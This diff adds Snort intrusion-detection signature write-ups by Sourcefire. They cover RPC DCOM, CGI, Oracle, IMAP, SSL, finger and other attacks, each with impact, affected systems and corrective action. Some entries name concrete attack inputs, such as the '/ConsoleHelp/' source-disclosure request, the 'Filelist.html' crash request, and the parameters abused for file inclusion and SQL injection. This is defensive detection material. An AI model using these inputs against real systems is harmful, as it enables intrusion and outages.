+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3230.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3230
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1156.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1156
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/854.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+854
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2475.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2475
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/833.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+833
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1958.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1958
+
+--
+Summary:
+This event is generated when an attempt is made to ping the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Intelligence gathering activity.  The sadmind ping will verify if the daemon is running.
+
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite applications to perform remote distributed system administration tasks such as adding new users.  The ping function associated with the sadmind daemon will verify if it is active. 
+
+--
+Affected Systems:
+All systems running sadmind.
+
+--
+Attack Scenarios:
+An attacker can ping the sadmind daemon to verify if it is active.  There are several exploits associated with this daemon.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/866
+
+--
--- /dev/null
+++ b/doc/signatures/1051.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1051
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000130.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000130
+
+-- 
+Summary: 
+This event is generated when a request for the file "Filelist.html" is sent to 
+the PY Software Active Webcam Server. 
+
+-- 
+
+Impact: 
+A denial of service will result, and the server will need to be manually 
+restarted.
+
+--
+Detailed Information:
+Requests for the file "Filelist.html" will cause the PY Software Active Webcam 
+Server to crash. This rule looks for such requests on port 8080, the default 
+port for this server.
+
+--
+Affected Systems:
+PY Software Active WebCam 4.3
+PY Software Active WebCam 5.5
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no known workarounds or fixes.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2827.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2827
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_master_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1274.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1274
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap
+GETPORT request to discover the port where the Remote Procedure Call
+(RPC) ttdbserverd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port
+ttdbserverd is using. Attackers can also learn what versions of the
+ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can
+be queried to determine the port where RPC services such as ttdbserverd
+run. The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications used in Common Desktop Environment
+(CDE) to communicate. The ToolTalk service receives ToolTalk messages
+created and sent by applications and delivers them to the appropriate
+recipient applications. The ToolTalk database server comes enabled on
+hosts with CDE. Multiple vulernabilities have been associated with the
+ToolTalk database server. 
+
+--
+Affected Systems:
+	All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs. This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule
+may generate an event.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not
+probes of the ttdbserverd service itself. Because RPC services often
+listen on fairly arbitrary ports, it may not be possible to detect
+misuses of the ttdbserverd service itself. An attacker may attempt to go
+directly to the ttdbserverd port without querying the portmapper
+service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000584.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000584
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "checkurl_web.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"checkurl_web.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/601.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid:
+601
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a
+machine using Network Information Services (NIS).
+
+--
+Impact: 
+Unknown. This is traffic that should not be seen when using NIS and
+remote login services.
+
+--
+Detailed Information: 
+This event is generated when spurious data is sent to the rlogin service
+running on a machine that is using NIS.
+
+--
+Attack Scenarios: 
+An attacker needs to generate this traffic and send it directly to a
+machine. This is not normal network behavior.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/330.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 330
+
+-- 
+Summary: 
+This is an intelligence gathering activity. This event is indicative of a connection laundering attack against the finger daemon
+
+-- 
+Impact: 
+The attacker may obtain information about a third party host without making a direct connection to that host.
+
+--
+Detailed Information:
+The event is generated when an attempt to use a machine to run
+finger queries against a third party UNIX system is attempted. 
+
+The attack utilizes "finger forwarding" functionality, normally used to forward queries to a third party machine. The information is obtained without a direct connection to the said third party, since the target system performs a connection to the third party host for the attacker. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack if successful, will confirm that the target host will try to forward queries.
+
+--
+Attack Scenarios: 
+An attacker runs a finger query and obtains information about the root account. He then proceeds to compromise the system using the obtained data as a basis for the compromise.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or upgrade to a daemon without finger forwarding functionality
+
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0105
+
+Arachnids:
+http://www.whitehats.com/info/IDS251
+
+--
--- /dev/null
+++ b/doc/signatures/2238.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2238
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in BEA Systems WebLogic Enterprise.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Some versions of BEA Systems WebLogic Enterprise allow an attacker to 
+view the aplication source code of documents in the web root of the 
+server.
+
+--
+Affected Systems:
+	BEA Systems WebLogic Enterprise 5.1, 5.1.x
+
+--
+Attack Scenarios:
+An attacker can view the source code and use that information to further
+exploit the server.
+
+The attacker merely needs to prepend an HTTP request with 
+"/ConsoleHelp/" to view the source of any file.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1518
+
+--
--- /dev/null
+++ b/doc/signatures/100000762.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000762
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Randshop" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "incl" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "incl" parameter in the "index.php" script used by the "Randshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Randshop
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000833.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000833
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "HiveMail" application running on a webserver. Access to the file "search.results.php" with SQL commands being passed as the "fields[]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "fields[]" parameter in the "search.results.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2504.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2504
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3148.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+3148
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Microsoft Windows Help.
+
+--
+Impact:
+Serious. Code execution is possible leading to unauthorized
+administrative access to the target host.
+
+--
+Detailed Information:
+Microsoft Windows Help can use ActiveX controls when dealing with
+Windows Help files.
+
+A programming error in the processing of a buffer that handles the
+"item" parameter of a help file can lead to the exposure of a buffer
+overflow condition. An attacker may be able to overflow this buffer and
+supply code of their choosing to be executed on the system with the
+privileges of the administrative account.
+
+In addition, applications may treat Windows Help as a trusted program
+and further exploitation and host firewall bypass may be possible.
+
+--
+Affected Systems:
+	Systems using Microsoft Windows
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting extra data into the input
+parameter of a malicious help file. The attacker may then insert code of
+their choosing to either run commands on the system or execute the code
+with the privileges of the administrative account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2599.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2599
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "add_grouped_column" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/3066.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3066
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"append" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/583.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+583
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rstatd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rstatd is using.  Attackers can also learn what versions of the rstatd protocol are accepted by rstatd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rstatd run.  The rstatd RPC service can be queried for performance statistics obtained from the kernel including network, disk, and CPU.  This can provide valuable information to determine which host may make a suitable target to participate in a particular attack. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rstatd runs.  This may be a precursor to querying rstatd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rstatd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rstatd, not probes of the rstatd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rstatd service itself. An attacker may attempt to go directly to the rstatd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS10
+
+
+--
